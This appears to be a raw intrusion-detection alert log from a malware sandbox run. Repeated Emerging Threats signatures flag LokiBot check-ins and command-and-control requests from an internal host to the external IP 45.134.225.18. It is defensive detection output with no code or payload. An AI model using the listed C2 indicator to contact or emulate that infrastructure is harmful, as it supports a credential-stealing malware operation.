                12/03/20-09:59:51.605096TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001380192.168.2.545.134.225.18
                12/03/20-09:59:51.605096TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001380192.168.2.545.134.225.18
                12/03/20-09:59:51.605096TCP2025381ET TROJAN LokiBot Checkin5001380192.168.2.545.134.225.18
                12/03/20-09:59:51.605096TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001380192.168.2.545.134.225.18
                12/03/20-09:59:51.888755TCP2570WEB-MISC Invalid HTTP Version String5001480192.168.2.545.134.225.18
                12/03/20-09:59:51.888755TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001480192.168.2.545.134.225.18
                12/03/20-09:59:51.888755TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001480192.168.2.545.134.225.18
                12/03/20-09:59:51.888755TCP2025381ET TROJAN LokiBot Checkin5001480192.168.2.545.134.225.18
                12/03/20-09:59:51.888755TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001480192.168.2.545.134.225.18
                12/03/20-09:59:52.170396TCP2570WEB-MISC Invalid HTTP Version String5001580192.168.2.545.134.225.18
                12/03/20-09:59:52.170396TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001580192.168.2.545.134.225.18
                12/03/20-09:59:52.170396TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001580192.168.2.545.134.225.18
                12/03/20-09:59:52.170396TCP2025381ET TROJAN LokiBot Checkin5001580192.168.2.545.134.225.18
                12/03/20-09:59:52.170396TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001580192.168.2.545.134.225.18
                12/03/20-09:59:52.460302TCP2570WEB-MISC Invalid HTTP Version String5001680192.168.2.545.134.225.18
                12/03/20-09:59:52.460302TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001680192.168.2.545.134.225.18
                12/03/20-09:59:52.460302TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001680192.168.2.545.134.225.18
                12/03/20-09:59:52.460302TCP2025381ET TROJAN LokiBot Checkin5001680192.168.2.545.134.225.18
                12/03/20-09:59:52.460302TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001680192.168.2.545.134.225.18
                12/03/20-09:59:52.751157TCP2570WEB-MISC Invalid HTTP Version String5001780192.168.2.545.134.225.18
                12/03/20-09:59:52.751157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001780192.168.2.545.134.225.18
                12/03/20-09:59:52.751157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001780192.168.2.545.134.225.18
                12/03/20-09:59:52.751157TCP2025381ET TROJAN LokiBot Checkin5001780192.168.2.545.134.225.18
                12/03/20-09:59:52.751157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001780192.168.2.545.134.225.18
                12/03/20-09:59:53.026244TCP2570WEB-MISC Invalid HTTP Version String5001880192.168.2.545.134.225.18
                12/03/20-09:59:53.026244TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001880192.168.2.545.134.225.18
                12/03/20-09:59:53.026244TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001880192.168.2.545.134.225.18
                12/03/20-09:59:53.026244TCP2025381ET TROJAN LokiBot Checkin5001880192.168.2.545.134.225.18
                12/03/20-09:59:53.026244TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001880192.168.2.545.134.225.18
                12/03/20-09:59:53.313351TCP2570WEB-MISC Invalid HTTP Version String5001980192.168.2.545.134.225.18
                12/03/20-09:59:53.313351TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001980192.168.2.545.134.225.18
                12/03/20-09:59:53.313351TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001980192.168.2.545.134.225.18
                12/03/20-09:59:53.313351TCP2025381ET TROJAN LokiBot Checkin5001980192.168.2.545.134.225.18
                12/03/20-09:59:53.313351TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001980192.168.2.545.134.225.18
                12/03/20-09:59:53.618964TCP2570WEB-MISC Invalid HTTP Version String5002080192.168.2.545.134.225.18
                12/03/20-09:59:53.618964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002080192.168.2.545.134.225.18
                12/03/20-09:59:53.618964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002080192.168.2.545.134.225.18
                12/03/20-09:59:53.618964TCP2025381ET TROJAN LokiBot Checkin5002080192.168.2.545.134.225.18
                12/03/20-09:59:53.618964TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002080192.168.2.545.134.225.18
                12/03/20-09:59:53.904172TCP2570WEB-MISC Invalid HTTP Version String5002180192.168.2.545.134.225.18
                12/03/20-09:59:53.904172TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002180192.168.2.545.134.225.18
                12/03/20-09:59:53.904172TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002180192.168.2.545.134.225.18
                12/03/20-09:59:53.904172TCP2025381ET TROJAN LokiBot Checkin5002180192.168.2.545.134.225.18
                12/03/20-09:59:53.904172TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002180192.168.2.545.134.225.18
                12/03/20-09:59:54.191137TCP2570WEB-MISC Invalid HTTP Version String5002280192.168.2.545.134.225.18
                12/03/20-09:59:54.191137TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002280192.168.2.545.134.225.18
                12/03/20-09:59:54.191137TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002280192.168.2.545.134.225.18
                12/03/20-09:59:54.191137TCP2025381ET TROJAN LokiBot Checkin5002280192.168.2.545.134.225.18
                12/03/20-09:59:54.191137TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002280192.168.2.545.134.225.18
                12/03/20-09:59:54.465897TCP2570WEB-MISC Invalid HTTP Version String5002380192.168.2.545.134.225.18
                12/03/20-09:59:54.465897TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002380192.168.2.545.134.225.18
                12/03/20-09:59:54.465897TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002380192.168.2.545.134.225.18
                12/03/20-09:59:54.465897TCP2025381ET TROJAN LokiBot Checkin5002380192.168.2.545.134.225.18
                12/03/20-09:59:54.465897TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002380192.168.2.545.134.225.18
                12/03/20-09:59:54.752488TCP2570WEB-MISC Invalid HTTP Version String5002480192.168.2.545.134.225.18
                12/03/20-09:59:54.752488TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002480192.168.2.545.134.225.18
                12/03/20-09:59:54.752488TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002480192.168.2.545.134.225.18
                12/03/20-09:59:54.752488TCP2025381ET TROJAN LokiBot Checkin5002480192.168.2.545.134.225.18
                12/03/20-09:59:54.752488TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002480192.168.2.545.134.225.18
                12/03/20-09:59:55.029848TCP2570WEB-MISC Invalid HTTP Version String5002580192.168.2.545.134.225.18
                12/03/20-09:59:55.029848TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002580192.168.2.545.134.225.18
                12/03/20-09:59:55.029848TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002580192.168.2.545.134.225.18
                12/03/20-09:59:55.029848TCP2025381ET TROJAN LokiBot Checkin5002580192.168.2.545.134.225.18
                12/03/20-09:59:55.029848TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002580192.168.2.545.134.225.18
                12/03/20-09:59:55.312925TCP2570WEB-MISC Invalid HTTP Version String5002680192.168.2.545.134.225.18
                12/03/20-09:59:55.312925TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002680192.168.2.545.134.225.18
                12/03/20-09:59:55.312925TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002680192.168.2.545.134.225.18
                12/03/20-09:59:55.312925TCP2025381ET TROJAN LokiBot Checkin5002680192.168.2.545.134.225.18
                12/03/20-09:59:55.312925TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002680192.168.2.545.134.225.18
                12/03/20-09:59:55.594479TCP2570WEB-MISC Invalid HTTP Version String5002780192.168.2.545.134.225.18
                12/03/20-09:59:55.594479TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002780192.168.2.545.134.225.18
                12/03/20-09:59:55.594479TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002780192.168.2.545.134.225.18
                12/03/20-09:59:55.594479TCP2025381ET TROJAN LokiBot Checkin5002780192.168.2.545.134.225.18
                12/03/20-09:59:55.594479TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002780192.168.2.545.134.225.18
                12/03/20-09:59:55.877948TCP2570WEB-MISC Invalid HTTP Version String5002880192.168.2.545.134.225.18
                12/03/20-09:59:55.877948TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002880192.168.2.545.134.225.18
                12/03/20-09:59:55.877948TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002880192.168.2.545.134.225.18
                12/03/20-09:59:55.877948TCP2025381ET TROJAN LokiBot Checkin5002880192.168.2.545.134.225.18
                12/03/20-09:59:55.877948TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002880192.168.2.545.134.225.18
                12/03/20-09:59:56.152435TCP2570WEB-MISC Invalid HTTP Version String5002980192.168.2.545.134.225.18
                12/03/20-09:59:56.152435TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002980192.168.2.545.134.225.18
                12/03/20-09:59:56.152435TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002980192.168.2.545.134.225.18
                12/03/20-09:59:56.152435TCP2025381ET TROJAN LokiBot Checkin5002980192.168.2.545.134.225.18
                12/03/20-09:59:56.152435TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002980192.168.2.545.134.225.18
                12/03/20-09:59:56.439679TCP2570WEB-MISC Invalid HTTP Version String5003080192.168.2.545.134.225.18
                12/03/20-09:59:56.439679TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003080192.168.2.545.134.225.18
                12/03/20-09:59:56.439679TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003080192.168.2.545.134.225.18
                12/03/20-09:59:56.439679TCP2025381ET TROJAN LokiBot Checkin5003080192.168.2.545.134.225.18
                12/03/20-09:59:56.439679TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003080192.168.2.545.134.225.18
                12/03/20-09:59:56.717292TCP2570WEB-MISC Invalid HTTP Version String5003180192.168.2.545.134.225.18
                12/03/20-09:59:56.717292TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003180192.168.2.545.134.225.18
                12/03/20-09:59:56.717292TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003180192.168.2.545.134.225.18
                12/03/20-09:59:56.717292TCP2025381ET TROJAN LokiBot Checkin5003180192.168.2.545.134.225.18
                12/03/20-09:59:56.717292TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003180192.168.2.545.134.225.18
                12/03/20-09:59:57.000933TCP2570WEB-MISC Invalid HTTP Version String5003280192.168.2.545.134.225.18
                12/03/20-09:59:57.000933TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003280192.168.2.545.134.225.18
                12/03/20-09:59:57.000933TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003280192.168.2.545.134.225.18
                12/03/20-09:59:57.000933TCP2025381ET TROJAN LokiBot Checkin5003280192.168.2.545.134.225.18
                12/03/20-09:59:57.000933TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003280192.168.2.545.134.225.18
                12/03/20-09:59:57.280421TCP2570WEB-MISC Invalid HTTP Version String5003380192.168.2.545.134.225.18
                12/03/20-09:59:57.280421TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003380192.168.2.545.134.225.18
                12/03/20-09:59:57.280421TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003380192.168.2.545.134.225.18
                12/03/20-09:59:57.280421TCP2025381ET TROJAN LokiBot Checkin5003380192.168.2.545.134.225.18
                12/03/20-09:59:57.280421TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003380192.168.2.545.134.225.18
                12/03/20-09:59:57.561964TCP2570WEB-MISC Invalid HTTP Version String5003480192.168.2.545.134.225.18
                12/03/20-09:59:57.561964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003480192.168.2.545.134.225.18
                12/03/20-09:59:57.561964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003480192.168.2.545.134.225.18
                12/03/20-09:59:57.561964TCP2025381ET TROJAN LokiBot Checkin5003480192.168.2.545.134.225.18
                12/03/20-09:59:57.561964TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003480192.168.2.545.134.225.18
                12/03/20-09:59:57.842858TCP2570WEB-MISC Invalid HTTP Version String5003580192.168.2.545.134.225.18
                12/03/20-09:59:57.842858TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003580192.168.2.545.134.225.18
                12/03/20-09:59:57.842858TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003580192.168.2.545.134.225.18
                12/03/20-09:59:57.842858TCP2025381ET TROJAN LokiBot Checkin5003580192.168.2.545.134.225.18
                12/03/20-09:59:57.842858TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003580192.168.2.545.134.225.18
                12/03/20-09:59:58.126952TCP2570WEB-MISC Invalid HTTP Version String5003680192.168.2.545.134.225.18
                12/03/20-09:59:58.126952TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003680192.168.2.545.134.225.18
                12/03/20-09:59:58.126952TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003680192.168.2.545.134.225.18
                12/03/20-09:59:58.126952TCP2025381ET TROJAN LokiBot Checkin5003680192.168.2.545.134.225.18
                12/03/20-09:59:58.126952TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003680192.168.2.545.134.225.18
                12/03/20-09:59:58.402295TCP2570WEB-MISC Invalid HTTP Version String5003780192.168.2.545.134.225.18
                12/03/20-09:59:58.402295TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003780192.168.2.545.134.225.18
                12/03/20-09:59:58.402295TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003780192.168.2.545.134.225.18
                12/03/20-09:59:58.402295TCP2025381ET TROJAN LokiBot Checkin5003780192.168.2.545.134.225.18
                12/03/20-09:59:58.402295TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003780192.168.2.545.134.225.18
                12/03/20-09:59:58.687575TCP2570WEB-MISC Invalid HTTP Version String5003880192.168.2.545.134.225.18
                12/03/20-09:59:58.687575TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003880192.168.2.545.134.225.18
                12/03/20-09:59:58.687575TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003880192.168.2.545.134.225.18
                12/03/20-09:59:58.687575TCP2025381ET TROJAN LokiBot Checkin5003880192.168.2.545.134.225.18
                12/03/20-09:59:58.687575TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003880192.168.2.545.134.225.18
                12/03/20-09:59:58.966305TCP2570WEB-MISC Invalid HTTP Version String5003980192.168.2.545.134.225.18
                12/03/20-09:59:58.966305TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003980192.168.2.545.134.225.18
                12/03/20-09:59:58.966305TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003980192.168.2.545.134.225.18
                12/03/20-09:59:58.966305TCP2025381ET TROJAN LokiBot Checkin5003980192.168.2.545.134.225.18
                12/03/20-09:59:58.966305TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003980192.168.2.545.134.225.18
                12/03/20-09:59:59.249735TCP2570WEB-MISC Invalid HTTP Version String5004080192.168.2.545.134.225.18
                12/03/20-09:59:59.249735TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004080192.168.2.545.134.225.18
                12/03/20-09:59:59.249735TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004080192.168.2.545.134.225.18
                12/03/20-09:59:59.249735TCP2025381ET TROJAN LokiBot Checkin5004080192.168.2.545.134.225.18
                12/03/20-09:59:59.249735TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004080192.168.2.545.134.225.18
                12/03/20-09:59:59.532765TCP2570WEB-MISC Invalid HTTP Version String5004180192.168.2.545.134.225.18
                12/03/20-09:59:59.532765TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004180192.168.2.545.134.225.18
                12/03/20-09:59:59.532765TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004180192.168.2.545.134.225.18
                12/03/20-09:59:59.532765TCP2025381ET TROJAN LokiBot Checkin5004180192.168.2.545.134.225.18
                12/03/20-09:59:59.532765TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004180192.168.2.545.134.225.18
                12/03/20-09:59:59.809638TCP2570WEB-MISC Invalid HTTP Version String5004280192.168.2.545.134.225.18
                12/03/20-09:59:59.809638TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004280192.168.2.545.134.225.18
                12/03/20-09:59:59.809638TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004280192.168.2.545.134.225.18
                12/03/20-09:59:59.809638TCP2025381ET TROJAN LokiBot Checkin5004280192.168.2.545.134.225.18
                12/03/20-09:59:59.809638TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004280192.168.2.545.134.225.18
                12/03/20-10:00:00.095649TCP2570WEB-MISC Invalid HTTP Version String5004380192.168.2.545.134.225.18
                12/03/20-10:00:00.095649TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004380192.168.2.545.134.225.18
                12/03/20-10:00:00.095649TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004380192.168.2.545.134.225.18
                12/03/20-10:00:00.095649TCP2025381ET TROJAN LokiBot Checkin5004380192.168.2.545.134.225.18
                12/03/20-10:00:00.095649TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004380192.168.2.545.134.225.18
                12/03/20-10:00:00.374718TCP2570WEB-MISC Invalid HTTP Version String5004480192.168.2.545.134.225.18
                12/03/20-10:00:00.374718TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004480192.168.2.545.134.225.18
                12/03/20-10:00:00.374718TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004480192.168.2.545.134.225.18
                12/03/20-10:00:00.374718TCP2025381ET TROJAN LokiBot Checkin5004480192.168.2.545.134.225.18
                12/03/20-10:00:00.374718TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004480192.168.2.545.134.225.18
                12/03/20-10:00:00.656235TCP2570WEB-MISC Invalid HTTP Version String5004580192.168.2.545.134.225.18
                12/03/20-10:00:00.656235TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004580192.168.2.545.134.225.18
                12/03/20-10:00:00.656235TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004580192.168.2.545.134.225.18
                12/03/20-10:00:00.656235TCP2025381ET TROJAN LokiBot Checkin5004580192.168.2.545.134.225.18
                12/03/20-10:00:00.656235TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004580192.168.2.545.134.225.18
                12/03/20-10:00:00.943449TCP2570WEB-MISC Invalid HTTP Version String5004680192.168.2.545.134.225.18
                12/03/20-10:00:00.943449TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004680192.168.2.545.134.225.18
                12/03/20-10:00:00.943449TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004680192.168.2.545.134.225.18
                12/03/20-10:00:00.943449TCP2025381ET TROJAN LokiBot Checkin5004680192.168.2.545.134.225.18
                12/03/20-10:00:00.943449TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004680192.168.2.545.134.225.18
                12/03/20-10:00:01.219175TCP2570WEB-MISC Invalid HTTP Version String5004780192.168.2.545.134.225.18
                12/03/20-10:00:01.219175TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004780192.168.2.545.134.225.18
                12/03/20-10:00:01.219175TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004780192.168.2.545.134.225.18
                12/03/20-10:00:01.219175TCP2025381ET TROJAN LokiBot Checkin5004780192.168.2.545.134.225.18
                12/03/20-10:00:01.219175TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004780192.168.2.545.134.225.18
                12/03/20-10:00:01.500183TCP2570WEB-MISC Invalid HTTP Version String5004880192.168.2.545.134.225.18
                12/03/20-10:00:01.500183TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004880192.168.2.545.134.225.18
                12/03/20-10:00:01.500183TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004880192.168.2.545.134.225.18
                12/03/20-10:00:01.500183TCP2025381ET TROJAN LokiBot Checkin5004880192.168.2.545.134.225.18
                12/03/20-10:00:01.500183TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004880192.168.2.545.134.225.18
                12/03/20-10:00:01.778387TCP2570WEB-MISC Invalid HTTP Version String5004980192.168.2.545.134.225.18
                12/03/20-10:00:01.778387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004980192.168.2.545.134.225.18
                12/03/20-10:00:01.778387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004980192.168.2.545.134.225.18
                12/03/20-10:00:01.778387TCP2025381ET TROJAN LokiBot Checkin5004980192.168.2.545.134.225.18
                12/03/20-10:00:01.778387TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004980192.168.2.545.134.225.18
                12/03/20-10:00:02.056961TCP2570WEB-MISC Invalid HTTP Version String5005080192.168.2.545.134.225.18
                12/03/20-10:00:02.056961TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005080192.168.2.545.134.225.18
                12/03/20-10:00:02.056961TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005080192.168.2.545.134.225.18
                12/03/20-10:00:02.056961TCP2025381ET TROJAN LokiBot Checkin5005080192.168.2.545.134.225.18
                12/03/20-10:00:02.056961TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005080192.168.2.545.134.225.18
                12/03/20-10:00:02.341214TCP2570WEB-MISC Invalid HTTP Version String5005180192.168.2.545.134.225.18
                12/03/20-10:00:02.341214TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005180192.168.2.545.134.225.18
                12/03/20-10:00:02.341214TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005180192.168.2.545.134.225.18
                12/03/20-10:00:02.341214TCP2025381ET TROJAN LokiBot Checkin5005180192.168.2.545.134.225.18
                12/03/20-10:00:02.341214TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005180192.168.2.545.134.225.18
                12/03/20-10:00:02.615256TCP2570WEB-MISC Invalid HTTP Version String5005280192.168.2.545.134.225.18
                12/03/20-10:00:02.615256TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005280192.168.2.545.134.225.18
                12/03/20-10:00:02.615256TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005280192.168.2.545.134.225.18
                12/03/20-10:00:02.615256TCP2025381ET TROJAN LokiBot Checkin5005280192.168.2.545.134.225.18
                12/03/20-10:00:02.615256TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005280192.168.2.545.134.225.18
                12/03/20-10:00:02.892814TCP2570WEB-MISC Invalid HTTP Version String5005380192.168.2.545.134.225.18
                12/03/20-10:00:02.892814TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005380192.168.2.545.134.225.18
                12/03/20-10:00:02.892814TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005380192.168.2.545.134.225.18
                12/03/20-10:00:02.892814TCP2025381ET TROJAN LokiBot Checkin5005380192.168.2.545.134.225.18
                12/03/20-10:00:02.892814TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005380192.168.2.545.134.225.18
                12/03/20-10:00:03.159563TCP2570WEB-MISC Invalid HTTP Version String5005480192.168.2.545.134.225.18
                12/03/20-10:00:03.159563TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005480192.168.2.545.134.225.18
                12/03/20-10:00:03.159563TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005480192.168.2.545.134.225.18
                12/03/20-10:00:03.159563TCP2025381ET TROJAN LokiBot Checkin5005480192.168.2.545.134.225.18
                12/03/20-10:00:03.159563TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005480192.168.2.545.134.225.18
                12/03/20-10:00:03.454640TCP2570WEB-MISC Invalid HTTP Version String5005580192.168.2.545.134.225.18
                12/03/20-10:00:03.454640TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005580192.168.2.545.134.225.18
                12/03/20-10:00:03.454640TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005580192.168.2.545.134.225.18
                12/03/20-10:00:03.454640TCP2025381ET TROJAN LokiBot Checkin5005580192.168.2.545.134.225.18
                12/03/20-10:00:03.454640TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005580192.168.2.545.134.225.18
                12/03/20-10:00:03.735111TCP2570WEB-MISC Invalid HTTP Version String5005680192.168.2.545.134.225.18
                12/03/20-10:00:03.735111TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005680192.168.2.545.134.225.18
                12/03/20-10:00:03.735111TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005680192.168.2.545.134.225.18
                12/03/20-10:00:03.735111TCP2025381ET TROJAN LokiBot Checkin5005680192.168.2.545.134.225.18
                12/03/20-10:00:03.735111TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005680192.168.2.545.134.225.18
                12/03/20-10:00:04.016231TCP2570WEB-MISC Invalid HTTP Version String5005780192.168.2.545.134.225.18
                12/03/20-10:00:04.016231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005780192.168.2.545.134.225.18
                12/03/20-10:00:04.016231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005780192.168.2.545.134.225.18
                12/03/20-10:00:04.016231TCP2025381ET TROJAN LokiBot Checkin5005780192.168.2.545.134.225.18
                12/03/20-10:00:04.016231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005780192.168.2.545.134.225.18
                12/03/20-10:00:04.285419TCP2570WEB-MISC Invalid HTTP Version String5005880192.168.2.545.134.225.18
                12/03/20-10:00:04.285419TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005880192.168.2.545.134.225.18
                12/03/20-10:00:04.285419TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005880192.168.2.545.134.225.18
                12/03/20-10:00:04.285419TCP2025381ET TROJAN LokiBot Checkin5005880192.168.2.545.134.225.18
                12/03/20-10:00:04.285419TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005880192.168.2.545.134.225.18
                12/03/20-10:00:04.554100TCP2570WEB-MISC Invalid HTTP Version String5005980192.168.2.545.134.225.18
                12/03/20-10:00:04.554100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005980192.168.2.545.134.225.18
                12/03/20-10:00:04.554100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005980192.168.2.545.134.225.18
                12/03/20-10:00:04.554100TCP2025381ET TROJAN LokiBot Checkin5005980192.168.2.545.134.225.18
                12/03/20-10:00:04.554100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005980192.168.2.545.134.225.18
                12/03/20-10:00:04.840861TCP2570WEB-MISC Invalid HTTP Version String5006080192.168.2.545.134.225.18
                12/03/20-10:00:04.840861TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006080192.168.2.545.134.225.18
                12/03/20-10:00:04.840861TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006080192.168.2.545.134.225.18
                12/03/20-10:00:04.840861TCP2025381ET TROJAN LokiBot Checkin5006080192.168.2.545.134.225.18
                12/03/20-10:00:04.840861TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006080192.168.2.545.134.225.18
                12/03/20-10:00:05.117261TCP2570WEB-MISC Invalid HTTP Version String5006180192.168.2.545.134.225.18
                12/03/20-10:00:05.117261TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006180192.168.2.545.134.225.18
                12/03/20-10:00:05.117261TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006180192.168.2.545.134.225.18
                12/03/20-10:00:05.117261TCP2025381ET TROJAN LokiBot Checkin5006180192.168.2.545.134.225.18
                12/03/20-10:00:05.117261TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006180192.168.2.545.134.225.18
                12/03/20-10:00:05.395045TCP2570WEB-MISC Invalid HTTP Version String5006280192.168.2.545.134.225.18
                12/03/20-10:00:05.395045TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006280192.168.2.545.134.225.18
                12/03/20-10:00:05.395045TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006280192.168.2.545.134.225.18
                12/03/20-10:00:05.395045TCP2025381ET TROJAN LokiBot Checkin5006280192.168.2.545.134.225.18
                12/03/20-10:00:05.395045TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006280192.168.2.545.134.225.18
                12/03/20-10:00:05.666385TCP2570WEB-MISC Invalid HTTP Version String5006380192.168.2.545.134.225.18
